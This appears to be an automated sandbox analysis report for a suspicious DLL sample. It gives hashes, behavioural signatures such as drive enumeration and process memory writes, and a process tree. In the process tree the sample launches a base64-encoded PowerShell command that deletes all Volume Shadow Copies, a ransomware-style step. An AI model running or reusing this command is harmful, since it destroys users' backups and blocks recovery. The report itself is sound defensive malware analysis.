Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
17-06-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
b861d987eccfae74a084ec2ab22556b6_JaffaCakes118.dll
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
b861d987eccfae74a084ec2ab22556b6_JaffaCakes118.dll
Resource
win10v2004-20240226-en
General
-
Target
b861d987eccfae74a084ec2ab22556b6_JaffaCakes118.dll
-
Size
114KB
-
MD5
b861d987eccfae74a084ec2ab22556b6
-
SHA1
b869546ef09656a52ba63916a4375f2f1c5b5ad6
-
SHA256
54c668a3d573e2f2ae4c3783f32739898e16f31338c0c1f223b0490712ec2e28
-
SHA512
ac50e5fc6cb81e42775ad743c1832ac371d4c101a0d00785b82932411a320bad3a11efb2caea7024d3503e23cb346526562deeef627f2c0576b53ee9967b6e22
-
SSDEEP
1536:t+UsJjrePaONg5khnnI5drFqgNNtrpNOxXICS4AR4YBQykTRB6+5Cs4L0+qBHaeP:t0rLOiqhnufNNtdxvJA76+5CsAb8HaeP
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4604 rundll32.exe 4604 rundll32.exe 4936 powershell.exe 4936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4604 rundll32.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeBackupPrivilege 3308 vssvc.exe Token: SeRestorePrivilege 3308 vssvc.exe Token: SeAuditPrivilege 3308 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2828 wrote to memory of 4604 2828 rundll32.exe 90 PID 2828 wrote to memory of 4604 2828 rundll32.exe 90 PID 2828 wrote to memory of 4604 2828 rundll32.exe 90 PID 4604 wrote to memory of 4936 4604 rundll32.exe 91 PID 4604 wrote to memory of 4936 4604 rundll32.exe 91 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\b861d987eccfae74a084ec2ab22556b6_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\b861d987eccfae74a084ec2ab22556b6_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3492
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3896 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:81⤵PID:788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82